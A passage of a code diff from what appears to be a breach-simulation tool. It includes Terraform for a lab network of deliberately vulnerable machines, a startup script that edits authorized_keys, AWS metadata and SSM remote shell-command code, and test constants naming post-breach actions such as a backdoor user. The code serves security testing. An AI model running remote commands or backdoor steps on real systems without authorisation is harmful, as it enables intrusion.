project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "scan-21" {
name = "scan-21"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "scan-22" {
name = "scan-22"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "struts2-23" {
name = "struts2-23"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "struts2-24" {
name = "struts2-24"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "island-linux-250" {
name = "island-linux-250"
project = "${local.monkeyzoo_project}"
}
data "google_compute_image" "island-windows-251" {
name = "island-windows-251"
project = "${local.monkeyzoo_project}"
}

View File

@ -0,0 +1,460 @@
// Local variables
locals {
default_ubuntu="${google_compute_instance_template.ubuntu16.self_link}"
default_windows="${google_compute_instance_template.windows2016.self_link}"
}
resource "google_compute_network" "monkeyzoo" {
name = "${local.resource_prefix}monkeyzoo"
auto_create_subnetworks = false
}
resource "google_compute_network" "tunneling" {
name = "${local.resource_prefix}tunneling"
auto_create_subnetworks = false
}
resource "google_compute_network" "tunneling2" {
name = "${local.resource_prefix}tunneling2"
auto_create_subnetworks = false
}
resource "google_compute_subnetwork" "monkeyzoo-main" {
name = "${local.resource_prefix}monkeyzoo-main"
ip_cidr_range = "10.2.2.0/24"
network = "${google_compute_network.monkeyzoo.self_link}"
}
resource "google_compute_subnetwork" "tunneling-main" {
name = "${local.resource_prefix}tunneling-main"
ip_cidr_range = "10.2.1.0/28"
network = "${google_compute_network.tunneling.self_link}"
}
resource "google_compute_subnetwork" "tunneling2-main" {
name = "${local.resource_prefix}tunneling2-main"
ip_cidr_range = "10.2.0.0/27"
network = "${google_compute_network.tunneling2.self_link}"
}
resource "google_compute_instance_from_template" "hadoop-2" {
name = "${local.resource_prefix}hadoop-2"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.hadoop-2.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.2"
}
// Add required ssh keys for hadoop service and restart it
metadata_startup_script = "[ ! -f /home/vakaris_zilius/.ssh/authorized_keys ] && sudo cat /home/vakaris_zilius/.ssh/id_rsa.pub >> /home/vakaris_zilius/.ssh/authorized_keys && sudo reboot"
}
resource "google_compute_instance_from_template" "hadoop-3" {
name = "${local.resource_prefix}hadoop-3"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.hadoop-3.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.3"
}
}
resource "google_compute_instance_from_template" "elastic-4" {
name = "${local.resource_prefix}elastic-4"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.elastic-4.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.4"
}
}
resource "google_compute_instance_from_template" "elastic-5" {
name = "${local.resource_prefix}elastic-5"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.elastic-5.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.5"
}
}
/* Couldn't find ubuntu packages for required samba version (too old).
resource "google_compute_instance_from_template" "sambacry-6" {
name = "${local.resource_prefix}sambacry-6"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.sambacry-6.self_link}"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.6"
}
}
*/
/* We need custom 32 bit Ubuntu machine for this (there are no 32 bit ubuntu machines in GCP).
resource "google_compute_instance_from_template" "sambacry-7" {
name = "${local.resource_prefix}sambacry-7"
source_instance_template = "${local.default_ubuntu}"
boot_disk {
initialize_params {
// Add custom image to cloud
image = "ubuntu32"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.7"
}
}
*/
resource "google_compute_instance_from_template" "shellshock-8" {
name = "${local.resource_prefix}shellshock-8"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.shellshock-8.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.8"
}
}
resource "google_compute_instance_from_template" "tunneling-9" {
name = "${local.resource_prefix}tunneling-9"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.tunneling-9.self_link}"
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling-main"
network_ip="10.2.1.9"
}
network_interface{
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.9"
}
}
resource "google_compute_instance_from_template" "tunneling-10" {
name = "${local.resource_prefix}tunneling-10"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.tunneling-10.self_link}"
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling-main"
network_ip="10.2.1.10"
}
network_interface{
subnetwork="${local.resource_prefix}tunneling2-main"
network_ip="10.2.0.10"
}
}
resource "google_compute_instance_from_template" "tunneling-11" {
name = "${local.resource_prefix}tunneling-11"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.tunneling-11.self_link}"
}
auto_delete = true
}
network_interface{
subnetwork="${local.resource_prefix}tunneling2-main"
network_ip="10.2.0.11"
}
}
resource "google_compute_instance_from_template" "sshkeys-11" {
name = "${local.resource_prefix}sshkeys-11"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.sshkeys-11.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.11"
}
}
resource "google_compute_instance_from_template" "sshkeys-12" {
name = "${local.resource_prefix}sshkeys-12"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.sshkeys-12.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.12"
}
}
/*
resource "google_compute_instance_from_template" "rdpgrinder-13" {
name = "${local.resource_prefix}rdpgrinder-13"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.rdpgrinder-13.self_link}"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.13"
}
}
*/
resource "google_compute_instance_from_template" "mimikatz-14" {
name = "${local.resource_prefix}mimikatz-14"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.mimikatz-14.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.14"
}
}
resource "google_compute_instance_from_template" "mimikatz-15" {
name = "${local.resource_prefix}mimikatz-15"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.mimikatz-15.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.15"
}
}
resource "google_compute_instance_from_template" "mssql-16" {
name = "${local.resource_prefix}mssql-16"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.mssql-16.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.16"
}
}
/* We need to alter monkey's behavior for this to upload 32-bit monkey instead of 64-bit (not yet developed)
resource "google_compute_instance_from_template" "upgrader-17" {
name = "${local.resource_prefix}upgrader-17"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.upgrader-17.self_link}"
}
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.17"
access_config {
// Cheaper, non-premium routing
network_tier = "STANDARD"
}
}
}
*/
resource "google_compute_instance_from_template" "weblogic-18" {
name = "${local.resource_prefix}weblogic-18"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.weblogic-18.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.18"
}
}
resource "google_compute_instance_from_template" "weblogic-19" {
name = "${local.resource_prefix}weblogic-19"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.weblogic-19.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.19"
}
}
resource "google_compute_instance_from_template" "smb-20" {
name = "${local.resource_prefix}smb-20"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.smb-20.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.20"
}
}
resource "google_compute_instance_from_template" "scan-21" {
name = "${local.resource_prefix}scan-21"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.scan-21.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.21"
}
}
resource "google_compute_instance_from_template" "scan-22" {
name = "${local.resource_prefix}scan-22"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.scan-22.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.22"
}
}
resource "google_compute_instance_from_template" "struts2-23" {
name = "${local.resource_prefix}struts2-23"
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.struts2-23.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.23"
}
}
resource "google_compute_instance_from_template" "struts2-24" {
name = "${local.resource_prefix}struts2-24"
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.struts2-24.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.24"
}
}
resource "google_compute_instance_from_template" "island-linux-250" {
name = "${local.resource_prefix}island-linux-250"
machine_type = "n1-standard-2"
tags = ["island", "linux", "ubuntu16"]
source_instance_template = "${local.default_ubuntu}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.island-linux-250.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.250"
access_config {
// Cheaper, non-premium routing (not available in some regions)
// network_tier = "STANDARD"
}
}
}
resource "google_compute_instance_from_template" "island-windows-251" {
name = "${local.resource_prefix}island-windows-251"
machine_type = "n1-standard-2"
tags = ["island", "windows", "windowsserver2016"]
source_instance_template = "${local.default_windows}"
boot_disk{
initialize_params {
image = "${data.google_compute_image.island-windows-251.self_link}"
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.251"
access_config {
// Cheaper, non-premium routing (not available in some regions)
// network_tier = "STANDARD"
}
}
}

View File

@ -0,0 +1,45 @@
resource "google_compute_instance_template" "ubuntu16" {
name = "${local.resource_prefix}ubuntu16"
description = "Creates ubuntu 16.04 LTS servers at europe-west3-a."
tags = ["test-machine", "ubuntu16", "linux"]
machine_type = "n1-standard-1"
can_ip_forward = false
disk {
source_image = "ubuntu-os-cloud/ubuntu-1604-lts"
}
network_interface {
subnetwork="monkeyzoo-main"
access_config {
// Cheaper, non-premium routing
network_tier = "STANDARD"
}
}
service_account {
email ="${local.service_account_email}"
scopes=["cloud-platform"]
}
}
resource "google_compute_instance_template" "windows2016" {
name = "${local.resource_prefix}windows2016"
description = "Creates windows 2016 core servers at europe-west3-a."
tags = ["test-machine", "windowsserver2016", "windows"]
machine_type = "n1-standard-1"
can_ip_forward = false
disk {
source_image = "windows-cloud/windows-2016"
}
network_interface {
subnetwork="monkeyzoo-main"
}
service_account {
email="${local.service_account_email}"
scopes=["cloud-platform"]
}
}

View File

@ -0,0 +1 @@
__author__ = 'itay.mizeretz'

View File

@ -0,0 +1,79 @@
import json
import re
import urllib2
import logging
__author__ = 'itay.mizeretz'
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
logger = logging.getLogger(__name__)
class AwsInstance(object):
"""
Class which gives useful information about the current instance you're on.
"""
def __init__(self):
self.instance_id = None
self.region = None
self.account_id = None
try:
self.instance_id = urllib2.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
self.region = self._parse_region(
urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)
try:
self.account_id = self._extract_account_id(
urllib2.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
if finding:
return finding[0]
else:
return None
def get_instance_id(self):
return self.instance_id
def get_region(self):
return self.region
def is_aws_instance(self):
return self.instance_id is not None
@staticmethod
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
in case Amazon break this mechanism.
:param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]
def get_account_id(self):
"""
:return: the AWS account ID which "owns" this instance.
See https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html
"""
return self.account_id

View File

@ -0,0 +1,88 @@
import logging
import boto3
import botocore
from botocore.exceptions import ClientError
from common.cloud.aws_instance import AwsInstance
__author__ = ['itay.mizeretz', 'shay.nehmad']
INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList'
INSTANCE_ID_KEY = 'InstanceId'
COMPUTER_NAME_KEY = 'ComputerName'
PLATFORM_TYPE_KEY = 'PlatformType'
IP_ADDRESS_KEY = 'IPAddress'
logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [{
'instance_id': x[INSTANCE_ID_KEY],
'name': x[COMPUTER_NAME_KEY],
'os': x[PLATFORM_TYPE_KEY].lower(),
'ip_address': x[IP_ADDRESS_KEY]
} for x in response[INSTANCE_INFORMATION_LIST_KEY]]
class AwsService(object):
"""
A wrapper class around the boto3 client and session modules, which supplies various AWS services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
"""
region = None
@staticmethod
def set_region(region):
AwsService.region = region
@staticmethod
def get_client(client_type, region=None):
return boto3.client(
client_type,
region_name=region if region is not None else AwsService.region)
@staticmethod
def get_session():
return boto3.session.Session()
@staticmethod
def get_regions():
return AwsService.get_session().get_available_regions('ssm')
@staticmethod
def test_client():
try:
AwsService.get_client('ssm').describe_instance_information()
return True
except ClientError:
return False
@staticmethod
def get_instances():
"""
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance
"""
current_instance = AwsInstance()
local_ssm_client = boto3.client("ssm", current_instance.get_region())
try:
response = local_ssm_client.describe_instance_information()
filtered_instances_data = filter_instance_data_from_aws_response(response)
return filtered_instances_data
except botocore.exceptions.ClientError as e:
logger.warning("AWS client error while trying to get instances: " + e.message)
raise e

View File

@ -0,0 +1,59 @@
from unittest import TestCase
from aws_service import filter_instance_data_from_aws_response
import json
__author__ = 'shay.nehmad'
class TestFilterInstanceDataFromAwsResponse(TestCase):
def test_filter_instance_data_from_aws_response(self):
json_response_full = """
{
"InstanceInformationList": [
{
"ActivationId": "string",
"AgentVersion": "string",
"AssociationOverview": {
"DetailedStatus": "string",
"InstanceAssociationStatusAggregatedCount": {
"string" : 6
}
},
"AssociationStatus": "string",
"ComputerName": "string",
"IamRole": "string",
"InstanceId": "string",
"IPAddress": "string",
"IsLatestVersion": "True",
"LastAssociationExecutionDate": 6,
"LastPingDateTime": 6,
"LastSuccessfulAssociationExecutionDate": 6,
"Name": "string",
"PingStatus": "string",
"PlatformName": "string",
"PlatformType": "string",
"PlatformVersion": "string",
"RegistrationDate": 6,
"ResourceType": "string"
}
],
"NextToken": "string"
}
"""
json_response_empty = """
{
"InstanceInformationList": [],
"NextToken": "string"
}
"""
self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{'instance_id': u'string',
'ip_address': u'string',
'name': u'string',
'os': u'string'}])

View File

View File

View File

@ -0,0 +1,26 @@
from common.cmd.cmd_result import CmdResult
__author__ = 'itay.mizeretz'
class AwsCmdResult(CmdResult):
"""
Class representing an AWS command result
"""
def __init__(self, command_info):
super(AwsCmdResult, self).__init__(
self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'],
command_info[u'StandardErrorContent'])
self.command_info = command_info
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.
"""
return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress'))

View File

@ -0,0 +1,42 @@
import logging
from common.cloud.aws_service import AwsService
from common.cmd.aws.aws_cmd_result import AwsCmdResult
from common.cmd.cmd_runner import CmdRunner
from common.cmd.cmd_status import CmdStatus
__author__ = 'itay.mizeretz'
logger = logging.getLogger(__name__)
class AwsCmdRunner(CmdRunner):
"""
Class for running commands on a remote AWS machine
"""
def __init__(self, is_linux, instance_id, region = None):
super(AwsCmdRunner, self).__init__(is_linux)
self.instance_id = instance_id
self.region = region
self.ssm = AwsService.get_client('ssm', region)
def query_command(self, command_id):
return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
def get_command_result(self, command_info):
return AwsCmdResult(command_info)
def get_command_status(self, command_info):
if command_info[u'Status'] == u'InProgress':
return CmdStatus.IN_PROGRESS
elif command_info[u'Status'] == u'Success':
return CmdStatus.SUCCESS
else:
return CmdStatus.FAILURE
def run_command_async(self, command_line):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
InstanceIds=[self.instance_id])
return command_res['Command']['CommandId']

11
monkey/common/cmd/cmd.py Normal file
View File

@ -0,0 +1,11 @@
__author__ = 'itay.mizeretz'
class Cmd(object):
"""
Class representing a command
"""
def __init__(self, cmd_runner, cmd_id):
self.cmd_runner = cmd_runner
self.cmd_id = cmd_id

View File

@ -0,0 +1,13 @@
__author__ = 'itay.mizeretz'
class CmdResult(object):
"""
Class representing a command result
"""
def __init__(self, is_success, status_code=None, stdout=None, stderr=None):
self.is_success = is_success
self.status_code = status_code
self.stdout = stdout
self.stderr = stderr

View File

@ -0,0 +1,158 @@
import time
import logging
from abc import abstractmethod
from common.cmd.cmd import Cmd
from common.cmd.cmd_result import CmdResult
from common.cmd.cmd_status import CmdStatus
__author__ = 'itay.mizeretz'
logger = logging.getLogger(__name__)
class CmdRunner(object):
"""
Interface for running commands on a remote machine
Since these classes are a bit complex, I provide a list of common terminology and formats:
* command line - a command line. e.g. 'echo hello'
* command - represent a single command which was already run. Always of type Cmd
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
* command info - Any consistent structure representing additional information of a command which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
# Default command timeout in seconds
DEFAULT_TIMEOUT = 5
# Time to sleep when waiting on commands.
WAIT_SLEEP_TIME = 1
def __init__(self, is_linux):
self.is_linux = is_linux
def run_command(self, command_line, timeout=DEFAULT_TIMEOUT):
"""
Runs the given command on the remote machine
:param command_line: The command line to run
:param timeout: Timeout in seconds for command.
:return: Command result
"""
c_id = self.run_command_async(command_line)
return self.wait_commands([Cmd(self, c_id)], timeout)[1]
@staticmethod
def run_multiple_commands(instances, inst_to_cmd, inst_n_cmd_res_to_res):
"""
Run multiple commands on various instances
:param instances: List of instances.
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value
"""
command_instance_dict = {}
for instance in instances:
command = inst_to_cmd(instance)
command_instance_dict[command] = instance
instance_results = {}
command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys())
for command, result in command_result_pairs:
instance = command_instance_dict[command]
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
return instance_results
@abstractmethod
def run_command_async(self, command_line):
"""
Runs the given command on the remote machine asynchronously.
:param command_line: The command line to run
:return: Command ID (in any format)
"""
raise NotImplementedError()
@staticmethod
def wait_commands(commands, timeout=DEFAULT_TIMEOUT):
"""
Waits on all commands up to given timeout
:param commands: list of commands (of type Cmd)
:param timeout: Timeout in seconds for command.
:return: commands and their results (tuple of Command and CmdResult)
"""
init_time = time.time()
curr_time = init_time
results = []
while (curr_time - init_time < timeout) and (len(commands) != 0):
for command in list(commands): # list(commands) clones the list. We do so because we remove items inside
CmdRunner._process_command(command, commands, results, True)
time.sleep(CmdRunner.WAIT_SLEEP_TIME)
curr_time = time.time()
for command in list(commands):
CmdRunner._process_command(command, commands, results, False)
for command, result in results:
if not result.is_success:
logger.error('The following command failed: `%s`. status code: %s',
str(command[1]), str(result.status_code))
return results
@abstractmethod
def query_command(self, command_id):
"""
Queries the already run command for more info
:param command_id: The command ID to query
:return: Command info (in any format)
"""
raise NotImplementedError()
@abstractmethod
def get_command_result(self, command_info):
"""
Gets the result of the already run command
:param command_info: The command info of the command to get the result of
:return: CmdResult
"""
raise NotImplementedError()
@abstractmethod
def get_command_status(self, command_info):
"""
Gets the status of the already run command
:param command_info: The command info of the command to get the result of
:return: CmdStatus
"""
raise NotImplementedError()
@staticmethod
def _process_command(command, commands, results, should_process_only_finished):
"""
Removes the command from the list, processes its result and appends to results
:param command: Command to process. Must be in commands.
:param commands: List of unprocessed commands.
:param results: List of command results.
:param should_process_only_finished: If True, processes only if command finished.
:return: None
"""
c_runner = command.cmd_runner
c_id = command.cmd_id
try:
command_info = c_runner.query_command(c_id)
if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
commands.remove(command)
results.append((command, c_runner.get_command_result(command_info)))
except Exception:
logger.exception('Exception while querying command: `%s`', str(c_id))
if not should_process_only_finished:
commands.remove(command)
results.append((command, CmdResult(False)))

View File

@ -0,0 +1,9 @@
from enum import Enum
__author__ = 'itay.mizeretz'
class CmdStatus(Enum):
IN_PROGRESS = 0
SUCCESS = 1
FAILURE = 2

View File

@ -0,0 +1,2 @@
from zero_trust_consts import populate_mappings
populate_mappings()

View File

@ -0,0 +1,2 @@
ES_SERVICE = 'elastic-search-9200'

View File

@ -0,0 +1,3 @@
POST_BREACH_COMMUNICATE_AS_NEW_USER = "Communicate as new user"
POST_BREACH_BACKDOOR_USER = "Backdoor user"
POST_BREACH_FILE_EXECUTION = "File execution"

View File

@ -0,0 +1,205 @@
"""
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
in creating findings.
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
AUTOMATION_ORCHESTRATION = u"Automation & Orchestration"
VISIBILITY_ANALYTICS = u"Visibility & Analytics"
WORKLOADS = u"Workloads"
DEVICES = u"Devices"
NETWORKS = u"Networks"
PEOPLE = u"People"
DATA = u"Data"
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
STATUS_UNEXECUTED = u"Unexecuted"
STATUS_PASSED = u"Passed"
STATUS_VERIFY = u"Verify"
STATUS_FAILED = u"Failed"
# Don't change order! The statuses are ordered by importance/severity.
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
TEST_MACHINE_EXPLOITED = u"machine_exploited"
TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
TEST_SEGMENTATION = u"segmentation"
TEST_TUNNELING = u"tunneling"
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
TESTS = (
TEST_SEGMENTATION,
TEST_MALICIOUS_ACTIVITY_TIMELINE,
TEST_SCHEDULED_EXECUTION,
TEST_ENDPOINT_SECURITY_EXISTS,
TEST_MACHINE_EXPLOITED,
TEST_DATA_ENDPOINT_HTTP,
TEST_DATA_ENDPOINT_ELASTIC,
TEST_TUNNELING,
TEST_COMMUNICATE_AS_NEW_USER
)
PRINCIPLE_DATA_TRANSIT = u"data_transit"
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
PRINCIPLE_SEGMENTATION = u"segmentation"
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
u"Access Control) only.",
}
POSSIBLE_STATUSES_KEY = u"possible_statuses"
PILLARS_KEY = u"pillars"
PRINCIPLE_KEY = u"principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
TEST_EXPLANATION_KEY = u"explanation"
TESTS_MAP = {
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
},
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
},
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
},
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
},
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
},
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
